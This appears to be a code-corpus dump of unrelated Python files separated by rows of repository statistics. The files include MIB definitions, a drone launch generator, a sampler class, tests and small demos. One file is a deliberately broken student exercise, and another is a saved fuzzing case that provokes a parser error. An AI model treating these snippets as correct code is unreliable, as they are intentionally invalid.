cut_path = cut_video(vid_path, start, length)
self.assertTrue(path.exists(cut_path))
def test_swap_faces(self):
from main import swap_faces
vid_path = Path("C:/Users/ru1072781/Repo/yt-swap/cut_vid/Rick Astley - Never Gonna Give You Up (Video).mp4")
im_path = Path("C:/Users/ru1072781/Repo/yt-swap/image_in/obama.png")
final_path = swap_faces(vid_path, im_path)
self.assertTrue(path.exists(final_path))
if __name__ == "__main__":
unittest.main() | 34.181818 | 117 | 0.673759 | 161 | 1,128 | 4.496894 | 0.341615 | 0.038674 | 0.049724 | 0.074586 | 0.310773 | 0.247238 | 0.247238 | 0.247238 | 0.201657 | 0 | 0 | 0.033219 | 0.226064 | 1,128 | 33 | 118 | 34.181818 | 0.796105 | 0 | 0 | 0 | 0 | 0.074074 | 0.234721 | 0.123118 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.148148 | false | 0 | 0.333333 | 0 | 0.518519 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
3e04a9768bbbb17f4ed78b49697ea7057eb92cd4 | 1,145 | py | Python | data_loading/sampler/abstract_sampler.py | justusschock/data_loading_stuff | 08a8d7b86f14a4901a9af4981d9a3c25a63ccb2a | [
"MIT"
] | null | null | null | data_loading/sampler/abstract_sampler.py | justusschock/data_loading_stuff | 08a8d7b86f14a4901a9af4981d9a3c25a63ccb2a | [
"MIT"
] | null | null | null | data_loading/sampler/abstract_sampler.py | justusschock/data_loading_stuff | 08a8d7b86f14a4901a9af4981d9a3c25a63ccb2a | [
"MIT"
] | null | null | null | from abc import abstractmethod
from ..dataset import AbstractDataset
class AbstractSampler(object):
"""
Class to define an abstract Sampling API
"""
    def __init__(self, indices=None):
        self._num_samples = len(indices) if indices is not None else 0
@classmethod
def from_dataset(cls, dataset: AbstractDataset, **kwargs):
"""
Classmethod to initialize the sampler from a given dataset
Parameters
----------
dataset : AbstractDataset
the given dataset
Returns
-------
:class:`AbstractSampler`
            The initialized sampler
"""
indices = list(range(len(dataset)))
return cls(indices, **kwargs)
@abstractmethod
def _get_next_index(self):
"""
Function to return a single index.
Implements the actual sampling strategy.
Returns
-------
int
the next index
"""
raise NotImplementedError
def __iter__(self):
for i in range(self._num_samples):
yield self._get_next_index()
def __len__(self):
return self._num_samples
| 21.203704 | 66 | 0.582533 | 112 | 1,145 | 5.732143 | 0.473214 | 0.03271 | 0.065421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.328384 | 1,145 | 53 | 67 | 21.603774 | 0.83485 | 0.310044 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0.117647 | 0.058824 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
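A minimal concrete sampler shows how `_get_next_index` plugs into the iteration protocol above. The abstract base is restated here without the dataset import so the sketch runs standalone; `SequentialSampler` is an illustrative name, not part of the package:

```python
from abc import abstractmethod

class AbstractSampler(object):
    """Restated base class (sans dataset import) for a standalone example."""
    def __init__(self, indices=None):
        self._num_samples = len(indices) if indices is not None else 0

    @abstractmethod
    def _get_next_index(self):
        raise NotImplementedError

    def __iter__(self):
        for i in range(self._num_samples):
            yield self._get_next_index()

    def __len__(self):
        return self._num_samples

class SequentialSampler(AbstractSampler):
    """Yields the given indices in order, one full pass."""
    def __init__(self, indices):
        super().__init__(indices)
        self._indices = list(indices)
        self._pos = 0

    def _get_next_index(self):
        idx = self._indices[self._pos]
        self._pos += 1
        return idx

assert list(SequentialSampler([3, 1, 2])) == [3, 1, 2]
```

Because `__iter__` drives the loop from `_num_samples`, subclasses only decide *which* index comes next (sequential, shuffled, weighted, ...), never how many are drawn.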
3e18c9a970af1d41319fdc1a7a55096c5b3309da | 10,286 | py | Python | pysnmp/GARP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/GARP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/GARP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module GARP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/GARP-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:04:38 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Bits, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, iso, ModuleIdentity, ObjectIdentity, Unsigned32, IpAddress, enterprises, Counter32, MibIdentifier, Integer32, Counter64, NotificationType, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "iso", "ModuleIdentity", "ObjectIdentity", "Unsigned32", "IpAddress", "enterprises", "Counter32", "MibIdentifier", "Integer32", "Counter64", "NotificationType", "Gauge32")
PhysAddress, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "PhysAddress", "TextualConvention", "DisplayString")
cabletron = MibIdentifier((1, 3, 6, 1, 4, 1, 52))
mibs = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4))
ctronExp = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2))
ctVLANMib = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2, 12))
ctVLANMgr = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1))
ctGarp = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3))
ctGarpTables = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2))
garpApplicationTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1), )
if mibBuilder.loadTexts: garpApplicationTable.setStatus('mandatory')
garpApplicationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1), ).setIndexNames((0, "GARP-MIB", "garpApplicationAppType"))
if mibBuilder.loadTexts: garpApplicationEntry.setStatus('mandatory')
garpApplicationAppType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpApplicationAppType.setStatus('mandatory')
garpApplicationName = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1, 2), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpApplicationName.setStatus('mandatory')
garpApplicationFailedRegistrations = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpApplicationFailedRegistrations.setStatus('mandatory')
garpApplicationOperationStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 1, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpApplicationOperationStatus.setStatus('mandatory')
garpPortOperationTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2), )
if mibBuilder.loadTexts: garpPortOperationTable.setStatus('mandatory')
garpPortOperationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2, 1), ).setIndexNames((0, "GARP-MIB", "garpPortOperationAppType"), (0, "GARP-MIB", "garpPortOperationPort"))
if mibBuilder.loadTexts: garpPortOperationEntry.setStatus('mandatory')
garpPortOperationAppType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpPortOperationAppType.setStatus('mandatory')
garpPortOperationPort = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpPortOperationPort.setStatus('mandatory')
garpPortOperationStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 2, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpPortOperationStatus.setStatus('mandatory')
garpTimerTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3), )
if mibBuilder.loadTexts: garpTimerTable.setStatus('mandatory')
garpTimerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1), ).setIndexNames((0, "GARP-MIB", "garpTimerAttributeAppType"), (0, "GARP-MIB", "garpTimerAttributePort"))
if mibBuilder.loadTexts: garpTimerEntry.setStatus('mandatory')
garpTimerAttributeAppType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpTimerAttributeAppType.setStatus('mandatory')
garpTimerAttributePort = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpTimerAttributePort.setStatus('mandatory')
garpTimerAttributeJoin = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpTimerAttributeJoin.setStatus('mandatory')
garpTimerAttributeLeave = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpTimerAttributeLeave.setStatus('mandatory')
garpTimerAttributeLeaveAll = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 3, 1, 5), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpTimerAttributeLeaveAll.setStatus('mandatory')
garpAttributeTable = MibTable((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4), )
if mibBuilder.loadTexts: garpAttributeTable.setStatus('mandatory')
garpAttributeEntry = MibTableRow((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1), ).setIndexNames((0, "GARP-MIB", "garpAttributeAppType"), (0, "GARP-MIB", "garpAttributePort"), (0, "GARP-MIB", "garpAttributeValue"), (0, "GARP-MIB", "garpAttributeGIPContextID"))
if mibBuilder.loadTexts: garpAttributeEntry.setStatus('mandatory')
garpAttributeAppType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeAppType.setStatus('mandatory')
garpAttributePort = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributePort.setStatus('mandatory')
garpAttributeValue = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeValue.setStatus('mandatory')
garpAttributeGIPContextID = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeGIPContextID.setStatus('mandatory')
garpAttributeType = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeType.setStatus('mandatory')
garpAttributeProtoAdminCtrl = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("normal-Participan", 0), ("non-Participan", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpAttributeProtoAdminCtrl.setStatus('mandatory')
garpAttributeRegisControl = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("garpRegistrarNormal", 0), ("garpRegistrarFixed", 1), ("garpRegistrarForbidden", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: garpAttributeRegisControl.setStatus('mandatory')
garpAttributeStateValue = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23))).clone(namedValues=NamedValues(("va-mt", 0), ("va-lv", 1), ("vp-mt", 2), ("vp-lv", 3), ("vo-mt", 4), ("vo-lv", 5), ("va-in", 6), ("vp-in", 7), ("vo-in", 8), ("aa-mt", 9), ("aa-lv", 10), ("aa-in", 11), ("ap-in", 12), ("ao-in", 13), ("qa-mt", 14), ("qa-lv", 15), ("qa-in", 16), ("qp-in", 17), ("qo-in", 18), ("la-mt", 19), ("la-lv", 20), ("lo-mt", 21), ("lo-lv", 22), ("la-in", 23)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeStateValue.setStatus('mandatory')
garpAttributeOrigOfLastPDU = MibTableColumn((1, 3, 6, 1, 4, 1, 52, 4, 2, 12, 1, 3, 2, 4, 1, 9), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: garpAttributeOrigOfLastPDU.setStatus('optional')
mibBuilder.exportSymbols("GARP-MIB", garpApplicationAppType=garpApplicationAppType, garpAttributeTable=garpAttributeTable, garpTimerTable=garpTimerTable, ctVLANMgr=ctVLANMgr, cabletron=cabletron, garpTimerEntry=garpTimerEntry, garpPortOperationTable=garpPortOperationTable, garpAttributeGIPContextID=garpAttributeGIPContextID, garpAttributeRegisControl=garpAttributeRegisControl, garpAttributeValue=garpAttributeValue, mibs=mibs, garpApplicationTable=garpApplicationTable, garpTimerAttributeJoin=garpTimerAttributeJoin, garpAttributeEntry=garpAttributeEntry, garpAttributeAppType=garpAttributeAppType, garpPortOperationAppType=garpPortOperationAppType, ctronExp=ctronExp, garpPortOperationEntry=garpPortOperationEntry, garpAttributeProtoAdminCtrl=garpAttributeProtoAdminCtrl, garpApplicationFailedRegistrations=garpApplicationFailedRegistrations, ctGarpTables=ctGarpTables, garpTimerAttributeLeaveAll=garpTimerAttributeLeaveAll, garpPortOperationStatus=garpPortOperationStatus, garpAttributePort=garpAttributePort, garpApplicationName=garpApplicationName, garpAttributeType=garpAttributeType, garpApplicationEntry=garpApplicationEntry, garpTimerAttributeLeave=garpTimerAttributeLeave, garpPortOperationPort=garpPortOperationPort, ctVLANMib=ctVLANMib, garpAttributeOrigOfLastPDU=garpAttributeOrigOfLastPDU, garpTimerAttributeAppType=garpTimerAttributeAppType, garpAttributeStateValue=garpAttributeStateValue, ctGarp=ctGarp, garpTimerAttributePort=garpTimerAttributePort, garpApplicationOperationStatus=garpApplicationOperationStatus)
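Every object in the module above is registered under the Cabletron enterprise arc (1.3.6.1.4.1.52). A standalone sketch with plain tuples (no pysnmp required; the tuples simply mirror the `MibIdentifier` values above) can sanity-check that each generated OID really extends its parent:

```python
# Standalone sketch: verify that each generated OID lies under its parent arc.
enterprises = (1, 3, 6, 1, 4, 1)
cabletron = enterprises + (52,)
ctGarpTables = cabletron + (4, 2, 12, 1, 3, 2)
garpAttributeEntry = ctGarpTables + (4, 1)

def is_child_of(oid, parent):
    """True if `oid` is below `parent` in the OID tree."""
    return oid[:len(parent)] == parent

assert is_child_of(ctGarpTables, cabletron)
assert is_child_of(garpAttributeEntry, ctGarpTables)
```

The same prefix check is how an SNMP agent decides which registered subtree serves an incoming OID.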
#!/usr/bin/env python
# Source: crazyflie_demo/scripts/generateLaunch.py (repo: xqgex/CrazyFlie_ros, MIT license)
# -*- coding: utf-8 -*-
import logger, sys
cf_logger = logger.get_logger(__name__) # debug(), info(), warning(), error(), exception(), critical()
def droneNode(current_drone_number):
return """ <group ns="$(arg frame{num})">
<node pkg="crazyflie_driver" type="crazyflie_add" name="crazyflie_add" output="screen">
<param name="uri" value="$(arg uri{num})" />
<param name="tf_prefix" value="$(arg frame{num})" />
<param name="enable_logging" value="True" />
<param name="enable_logging_imu" value="False" />
<param name="enable_logging_temperature" value="False" />
<param name="enable_logging_magnetic_field" value="False" />
<param name="enable_logging_pressure" value="False" />
<param name="enable_logging_battery" value="True" />
<param name="enable_logging_packets" value="False" />
<rosparam>
genericLogTopics: ["log1"]
genericLogTopicFrequencies: [100]
genericLogTopic_log1_Variables: ["stateEstimate.x", "stateEstimate.y", "stateEstimate.z"]
</rosparam>
</node>
<node name="pose" pkg="crazyflie_demo" type="publishPosition.py" args="$(arg frame{num})" output="screen">
<param name="topic" value="/$(arg frame{num})/vrpn_client_node/$(arg frame{num})/pose" />
</node>
<node pkg="vrpn_client_ros" type="vrpn_client_node" name="vrpn_client_node" output="screen">
<rosparam subst_value="true">
server: $(arg ip)
port: $(arg port)
update_frequency: 100.0
frame_id: /world
child_frame_id: $(arg frame{num})
use_server_time: false
broadcast_tf: true
refresh_tracker_frequency: 0.0
trackers:
- $(arg frame{num})
</rosparam>
</node>
</group>""".format(num=current_drone_number)
def ledNode(current_led_name):
return """ <node pkg="vrpn_client_ros" type="vrpn_client_node" name="vrpn_client_node_{led}" output="screen">
<rosparam subst_value="true">
server: $(arg ip)
port: $(arg port)
update_frequency: 100.0
frame_id: /world
child_frame_id: {led}
use_server_time: false
broadcast_tf: true
refresh_tracker_frequency: 0.0
trackers:
- {led}
</rosparam>
</node>""".format(led=current_led_name)
def fileStracture(ip, port, drones, leds):
drone_args = []
for drone_number in range(len(drones)):
drone_args.append(""" <arg name="uri{num}" default="radio://0/80/2M/E7E7E7E70{mac}" />
<arg name="frame{num}" default=\"{name}" />""".format(num=drone_number, mac=drones[drone_number][-1], name=drones[drone_number]))
drone_args = "\n".join(drone_args)
drones_text = [droneNode(drone_number) for drone_number in range(len(drones))]
drones_text = "\n".join(drones_text)
leds_text = [ledNode(led_name) for led_name in leds]
leds_text = "\n".join(leds_text)
return """<?xml version="1.0"?>
<launch>
{drone_args}
<arg name="ip" default="{ip}" />
<arg name="port" default="{port}" />
<include file="$(find crazyflie_driver)/launch/crazyflie_server.launch"></include>
{drones_text}
{leds_text}
</launch>
""".format(ip=ip, port=port, drone_args=drone_args, drones_text=drones_text, leds_text=leds_text)
def generate(file_name, ip, port, drones, leds):
try:
with open(file_name, "w") as outfile:
outfile.write(fileStracture(ip, port, drones, leds))
return True
except Exception as e:
cf_logger.exception("Failed to create {}".format(file_name))
return False
if __name__ == "__main__":
	print("This is not the way to do it...")
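The generator above is essentially string templating: each drone contributes a pair of `<arg>` elements whose radio URI suffix reuses the last character of the drone name. A reduced, ROS-free sketch of that one template (hypothetical helper name, same formatting convention as `drone_args` above) makes the convention explicit:

```python
def drone_arg(num, name):
    # Mirrors the drone_args template above: the URI suffix reuses the
    # last character of the drone name, as in the original script.
    return ('    <arg name="uri{num}" default="radio://0/80/2M/E7E7E7E70{mac}" />\n'
            '    <arg name="frame{num}" default="{name}" />').format(
                num=num, mac=name[-1], name=name)

xml = drone_arg(0, "crazyflie1")
assert 'uri0' in xml
assert xml.count("E7E7E7E701") == 1   # URI suffix taken from the trailing "1"
```

Note this convention only works for drone names ending in a single distinguishing character; two names with the same last character would collide on the radio URI.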
# Source: NexGCN/Test.py (repo: abhilash1910/NexGCN, MIT license)
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 12 01:38:00 2020
@author: 45063883
"""
import networkx as nx
from networkx import karate_club_graph, to_numpy_matrix
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.layers import Dense, Flatten,Embedding,Dropout
from keras.models import Sequential, Model
from keras import initializers, regularizers,activations,constraints
import keras.backend as k
from tensorflow.keras.layers import Layer,Input
from keras.optimizers import Adam
import numpy as np
from networkx import to_numpy_matrix, degree_centrality, betweenness_centrality, shortest_path_length,in_degree_centrality,out_degree_centrality,eigenvector_centrality,katz_centrality,closeness_centrality
import matplotlib.pyplot as plt
import NexGCN as venom
Gr = nx.gnm_random_graph(70,140)
exp=venom.ExperimentalGCN()
kernel=venom.feature_kernels()
#X=kernel.centrality_kernel(katz_centrality,Gr)
X=kernel.feature_random_weight_kernel(34,Gr)
#X=kernel.feature_distributions(np.random.poisson(4,9),Gr)
exp.create_network(Gr,X,True)
# Xs=np.matrix([
# [np.random.randn(),np.random.randn(),np.random.randn()]
# for j in range(exp.network.A.shape[0])
# ])
#
# exp.create_network(None,Xs,True)
#
predictions=exp.extract_binary_features(2048,2,keras.activations.sigmoid,'adam',5,20,1)
print(predictions)
exp.draw_graph(predictions,exp.network.F.shape[-1],300,True,90,90,'#00FFFF','#FF00FF')
output_class=exp.get_outcome(37)
print(output_class)
# Source: deepbiome/__init__.py (repo: Young-won/deepbiome, BSD-3-Clause license)
# -*- coding: utf-8 -*-
"""Top-level package for deepbiome."""
__author__ = """Youngwon Choi"""
__email__ = 'youngwon08@gmail.com'
__version__ = '1.0.0'
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
# Source: ITcoach/len_more_program/more_program.py (repo: ww35133634/chenxusheng, AFL-3.0 license)
# import threading
#
# num = 1
#
#
# def demo1():
# global num  # promote num to a global variable
# num += 1
# print("num in demo1 is %s" % num)
#
#
# def demo2():
# print("num in demo2 is %s" % num)
#
#
# def main():
# t1 = threading.Thread(target=demo1)
# t2 = threading.Thread(target=demo2)
# t1.start()
# t2.start()
#
#
# if __name__ == "__main__":
# main()
import threading
list1 = [1,2,3,4]
def demo1(i):
    # global list1  # not needed: list1 is a list, so its elements can be mutated without global
list1.append(i)
    print("list1 in demo1 is %s" % list1)
def demo2():
    print("list1 in demo2 is %s" % list1)
def main():
    t1 = threading.Thread(target=demo1, args=(5,))  # args passes the actual arguments as a tuple
t2 = threading.Thread(target=demo2)
t1.start()
t2.start()
if __name__ == "__main__":
main()
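The script above leans on the fact that a list can be mutated without `global`; once several threads append concurrently, a `threading.Lock` makes the shared access explicit and safe. This is a general sketch extending the lesson, not part of the original exercise:

```python
import threading

shared = []
lock = threading.Lock()

def worker(i):
    with lock:               # serialize access to the shared list
        shared.append(i)

threads = [threading.Thread(target=worker, args=(n,)) for n in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()

assert sorted(shared) == [0, 1, 2, 3, 4]   # every append survived
```

CPython's `list.append` happens to be atomic under the GIL, but the lock keeps the code correct even for compound updates (read-modify-write) where the GIL alone is not enough.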
# Source: src/rectangle_perimeter.py (repo: Athenian-Computer-Science/variables-intro-practice-template, Apache-2.0 license)
#############################
# Collaborators: (enter people or resources who/that helped you)
# If none, write none
#
#
#############################
# Fix the program below:
base = input(Enter the base: )
input(Enter the height: ) = height
perimeter = base + height * 2
print("The perimeter of the rectangle is {perimeter}.")
# Source: bigchaindb/exceptions.py (repo: AbhishaB/bigchaindb; also vendored as
# packages/p2lara/src/storages/bigchaindb/exceptions.py in Imranashraf101/Decentralized-Internet)
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
class BigchainDBError(Exception):
"""Base class for BigchainDB exceptions."""
class CriticalDoubleSpend(BigchainDBError):
"""Data integrity error that requires attention"""
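Deriving `CriticalDoubleSpend` from `BigchainDBError` lets callers catch either the specific error or the whole family with one base-class handler. A quick illustration (the two classes are re-declared so the snippet is self-contained):

```python
class BigchainDBError(Exception):
    """Base class for BigchainDB exceptions."""

class CriticalDoubleSpend(BigchainDBError):
    """Data integrity error that requires attention"""

try:
    raise CriticalDoubleSpend("double spend detected")
except BigchainDBError as err:       # base-class handler catches the subclass
    caught = type(err).__name__

assert caught == "CriticalDoubleSpend"
```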
# Source: buggyFile/8.py (repo: anonymousWork000/TVMfuzz, Apache-2.0 license)
import tvm.topi.testing
import tvm.relay.transform
import tvm.relay.testing
import tvm
import tvm.relay as relay
import pytest
import tvm.testing
from tvm.tir.expr import *
from tvm.relay.dataflow_pattern import *
warning = pytest.raises(tvm.error.DiagnosticError)
def assert_graph_equal(lhs, rhs):
tvm.ir.assert_structural_equal(lhs, rhs, map_free_vars=True)
def graph_equal(lhs, rhs):
return tvm.ir.structural_equal(lhs, rhs, map_free_vars=True)
def roundtrip_expr(expr):
text = tvm.relay.Expr.astext(expr, show_meta_data=False)
x = tvm.parser.parse_expr(text)
assert_graph_equal(x, expr)
def roundtrip(expr):
x = tvm.parser.fromtext(expr.astext())
assert_graph_equal(x, expr)
def parse_text(code):
expr = tvm.parser.parse_expr(code)
roundtrip_expr(expr)
return expr
with warning:
    res = parse_text('''meta[random_entry][15123]''')
# Source: pysnmp/CISCO-BITS-CLOCK-CAPABILITY.py (repo: agustinhenze/mibs.snmplabs.com, Apache-2.0 license)
#
# PySNMP MIB module CISCO-BITS-CLOCK-CAPABILITY (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-BITS-CLOCK-CAPABILITY
# Produced by pysmi-0.3.4 at Mon Apr 29 17:34:01 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueRangeConstraint, ConstraintsIntersection, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueRangeConstraint", "ConstraintsIntersection", "ValueSizeConstraint")
ciscoAgentCapability, = mibBuilder.importSymbols("CISCO-SMI", "ciscoAgentCapability")
NotificationGroup, AgentCapabilities, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "AgentCapabilities", "ModuleCompliance")
MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Gauge32, NotificationType, Bits, ObjectIdentity, ModuleIdentity, MibIdentifier, Unsigned32, TimeTicks, Counter64, IpAddress, iso, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Gauge32", "NotificationType", "Bits", "ObjectIdentity", "ModuleIdentity", "MibIdentifier", "Unsigned32", "TimeTicks", "Counter64", "IpAddress", "iso", "Counter32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ciscoBitsClockCapability = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 7, 433))
ciscoBitsClockCapability.setRevisions(('2005-03-08 00:00',))
if mibBuilder.loadTexts: ciscoBitsClockCapability.setLastUpdated('200503080000Z')
if mibBuilder.loadTexts: ciscoBitsClockCapability.setOrganization('Cisco Systems, Inc.')
ciscoBitsClockV12R025000SW1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 9, 7, 433, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoBitsClockV12R025000SW1 = ciscoBitsClockV12R025000SW1.setProductRelease('Cisco IOS 12.2(25)SW1')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoBitsClockV12R025000SW1 = ciscoBitsClockV12R025000SW1.setStatus('current')
mibBuilder.exportSymbols("CISCO-BITS-CLOCK-CAPABILITY", ciscoBitsClockCapability=ciscoBitsClockCapability, ciscoBitsClockV12R025000SW1=ciscoBitsClockV12R025000SW1, PYSNMP_MODULE_ID=ciscoBitsClockCapability)
